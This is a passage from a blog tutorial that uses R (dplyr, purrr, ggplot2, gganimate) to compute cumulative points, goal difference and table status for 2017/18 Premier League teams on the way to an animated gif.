&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt;(i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(prem)){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTHG[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTAG[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTAG[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTHG[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date HomeTeam AwayTeam FTHG FTAG FTR Arsenal Bournemouth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal Leicest… 4 3 H 1 NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Brighton Man City 0 2 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-12 Chelsea Burnley 2 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-12 Crystal… Hudders… 0 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-12 Everton Stoke 1 0 H NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-12 Southam… Swansea 0 0 D NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 18 more variables:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can see now for when Arsenal beat Leicester 4-3, instead of having a 3 in the &lt;code&gt;Arsenal&lt;/code&gt; variable, we have a 1 to signify Arsenal won by 1 goal. Now we follow the same process as before in that we gather the data into long format, join with the empty data set of days, turn the &lt;code&gt;NA&lt;/code&gt;s into 0’s and then calculate the cumulative goal difference over the season.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(Team, GD, Arsenal&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;`West Ham`) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date, Team, GD) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(GD)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(empty, prem_gd)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[is.na&lt;/span&gt;(prem_gd)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Team) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(GD &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(GD)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we need to join the two data sets!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(prem_points, prem_gd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Again using Arsenal as the example team, the data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arsenal&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 105 x 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points GD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-13 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-19 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-20 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-21 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 2017-08-26 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2017-08-27 Arsenal 3 -4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 2017-09-09 Arsenal 6 -1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 2017-09-10 Arsenal 6 -1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 95 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can see not only when Arsenal picked up points, but when they dropped points as well. For example, on the 27th of August, they got beat by 4 goals as their goal difference shifted from 0 to -4.&lt;/p&gt;
&lt;p&gt;We’re not done there! For the gif, we want to be able to display the current status of the team on each day i.e. Champions League (4th or above), Europa League (5th - 7th), Top Half (8th - 10th), Bottom Half (11th - 17th) or Relegation Zone (18th or below). To do this, on each day, we first need to retrieve the order of each team based on their points and goal difference&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(Points), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(GD)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;row_number&lt;/span&gt;()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After that, we can quite easily calculate their position status using our own function, and a bit of {purrr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Qual &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Champions League&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Europa League&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Top Half&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bottom Half&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Relegation&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_chr&lt;/span&gt;(Position, Qual),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Status &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(Status, levels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Champions League&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Europa League&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Top Half&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bottom Half&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Relegation&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem_total)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points GD Position Status&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2018-05-13 Man City 100 79 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2018-05-09 Man City 97 78 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2018-05-10 Man City 97 78 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2018-05-06 Man City 94 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2018-05-08 Man City 94 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2018-04-29 Man City 93 76 1 Champions League&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that here I’m using a factor to reorganise the legend in the plot we’re about to make. We’re looking for a path of a teams points and goal difference over a season, with a colour scheme for where they are in the table at that point. This is what that looks for one team (here I&amp;rsquo;m using Newcastle United)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Newcastle&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(GD, Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Status), size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_path&lt;/span&gt;(linetype &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;NUFC Points/Goal Difference Path&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Season 2017/2018&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_brewer&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Paired&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="Newcastle-points-gd-plot.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Bear in mind we’re going to have 20 teams on the graph and so instead of just using points, we’re going to use labels with the team’s name on.&lt;/p&gt;
&lt;p&gt;Now, adding {gganimate} is relatively pain-free. The package comes with lots of functions titled &lt;code&gt;transition_*()&lt;/code&gt;. These dictate by what variable your gif will change. We want our gif to be over time i.e. the variable &lt;code&gt;Date&lt;/code&gt;. There is a specific &lt;code&gt;transition&lt;/code&gt; function that works with time, called &lt;code&gt;transition_time()&lt;/code&gt;. {gganimate} is also lovely in the way that we can just add these functions to regular ggplots.&lt;/p&gt;
